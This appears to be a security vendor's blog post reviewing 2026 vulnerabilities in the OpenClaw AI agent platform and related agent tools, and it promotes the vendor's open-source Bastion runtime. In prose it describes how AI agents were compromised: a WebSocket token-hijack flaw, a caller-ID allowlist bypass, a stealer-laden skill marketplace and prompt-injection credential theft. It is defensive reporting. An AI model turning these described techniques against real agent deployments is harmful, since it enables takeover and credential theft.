OpenClaw crossed 135,000 GitHub stars in early 2026. Within weeks, security researchers disclosed a cascade of critical vulnerabilities that turned it into the first major AI agent security crisis of the year. Over 42,000 instances were found exposed on the public internet, a supply chain attack poisoned 20% of its skill marketplace, and at least 12 CVEs were published in under two months.
This isn’t just an OpenClaw problem. It’s a preview of what happens when AI agents go mainstream without runtime security.
The Vulnerabilities
ClawJacked: One Click to Full Agent Takeover
CVE-2026-25253 (CVSS 8.8) is the most widely reported. OpenClaw’s Control UI automatically trusted a gatewayURL query parameter and established a WebSocket connection that included the user’s authentication token without verifying origin. Any website could silently connect to a user’s local OpenClaw instance and take full control.
The root cause: OpenClaw assumed all localhost connections were implicitly trusted. A victim only needed to visit a malicious webpage. No plugins, no extensions, no additional interaction required.
Pre-Auth Voice RCE: No Credentials Needed
CVE-2026-28446 (CVSS 9.8) is the most severe. The voice-call extension’s inbound allowlist could be bypassed with an empty Caller ID and suffix matching. No authentication needed. Once exploited, an attacker could read the entire conversation history, every document the agent had processed, and every credential stored.
The Rest of the CVE List
| CVE | Type | Severity |
|---|---|---|
| CVE-2026-24763 | Command injection via Docker PATH | High |
| CVE-2026-25157 | OS command injection via SSH handler | High |
| CVE-2026-25475 | Path traversal / arbitrary file read | High |
| CVE-2026-28484 | Option injection RCE | High |
| + 6 more | SSRF, auth bypass, brute-force | Various |
No rate limits on failed passwords. No origin validation on WebSocket connections. No input sanitization on file paths. These aren’t exotic zero-days. They’re basic security hygiene failures, amplified by the fact that the system being exploited is an autonomous AI agent with access to tools, files, and credentials.
Full CVE tracking: jgamblin/OpenClawCVEs
42,000 Instances Exposed
Multiple scanning teams found staggering numbers of publicly exposed OpenClaw instances:
- Bitsight: 30,000+
- SecurityScorecard: 40,000+
- Independent researcher Maor Dayan: 42,665 total
Of those, 93.4% had authentication bypass conditions. 12,812 were directly exploitable via RCE. Spread across 52 countries, with the US and China hosting the largest concentrations.
These aren’t honeypots. These are production AI agent instances with real data, real credentials, and real tool access sitting wide open on the internet.
ClawHavoc: The Skill Marketplace Got Poisoned
If the CVEs weren’t enough, the OpenClaw skill marketplace (ClawHub) was massively compromised in what researchers called the “ClawHavoc” campaign:
- 1,184+ malicious skill packages discovered (approximately 20% of the entire registry)
- All delivered Atomic macOS Stealer (AMOS), targeting crypto exchange API keys, wallet private keys, SSH credentials, and browser passwords
- All malicious skills shared the same C2 infrastructure
- Disguised as crypto trading and wallet automation tools
- Social engineering tactics tricked users into executing commands
This is the AI agent equivalent of a compromised npm registry, except the “packages” have autonomous execution capabilities and access to your filesystem.
It’s Not Just OpenClaw
The MCP ecosystem has its own growing list:
- CVE-2025-6514 (CVSS 9.6): Full RCE in mcp-remote, affecting 437,000+ downloads. Command injection via OAuth flow.
- Smithery.ai breach: Path traversal exposed 3,000+ hosted MCP servers to arbitrary code execution and API key capture.
- Figma MCP Server (CVE-2025-53967): Command injection in a tool used by 100k+ developers monthly.
- 8,000+ MCP servers found exposed on the public internet with no authentication.
An analysis of 2,614 MCP implementations found 82% vulnerable to path traversal, 67% to code injection, and 34% to command injection.
LangChain got hit too. The “LangGrinch” vulnerability (CVE-2025-68664, CVSS 9.3) allowed attackers to steal all environment variables, including cloud credentials and database connection strings, through a serialization injection triggered by prompt injection.
Even Claude Code wasn’t immune. CVE-2025-59536 enabled RCE through malicious project configuration files.
The Pattern
Every major AI agent platform has now had a critical security incident. The attack patterns are consistent:
-
Implicit trust assumptions. Localhost is trusted. Tool outputs are trusted. Skill packages are trusted. None of these assumptions hold when agents are autonomous.
-
Missing input validation at every boundary. File paths, URLs, command parameters, OAuth endpoints. The basics that web security learned a decade ago haven’t made it into agent frameworks yet.
-
Supply chain as the primary attack vector. ClawHub, Smithery, npm MCP packages. When agents install and execute third-party code autonomously, the supply chain becomes the attack surface.
-
Agents amplify everything. A path traversal bug in a web app leaks one file. A path traversal bug in an AI agent leaks every file the agent has been told to process, plus its credentials, plus its conversation history, plus whatever tools it has access to.
OWASP has responded with both Top 10 for Agentic Applications and MCP Top 10. The EU AI Act’s high-risk system obligations take full effect on August 2, 2026. The industry is catching up, but the deployments are moving faster than the standards.
What This Means
The OpenClaw crisis demonstrates something we’ve been arguing: request-level security is not enough for AI agents.
Checking individual API calls for malicious content doesn’t help when:
- The attack is a supply chain compromise that installs a backdoored skill
- The exploit is a WebSocket connection that bypasses content inspection entirely
- The exfiltration happens through a legitimate tool call with a path traversal payload
- The attack chain unfolds across multiple turns, each looking normal in isolation
AI agents need runtime security layers that:
- Inspect content at every boundary: tool inputs, tool outputs, model requests, model responses. Not just the initial prompt.
- Monitor sequences, not single requests: chain detection that catches multi-step attacks where each step looks benign.
- Enforce tool allowlists, not just blocklists: only permit explicitly declared tool sets per agent identity, rejecting everything else by default.
- Run locally: a cloud gateway can’t inspect localhost WebSocket traffic. A cloud gateway can’t see what tools your local agent is calling. The security layer needs to be where the agent is.
This is exactly what we’re building with Bastion: an open-source local AI security runtime that sits between your agent and the outside world, scanning for data leakage, prompt injection, suspicious tool chains, and multi-step attack patterns.
The question is no longer whether AI agents need security. OpenClaw just showed us what happens without it.
Bastion is open-source and runs locally as a sidecar proxy. No data leaves your machine. GitHub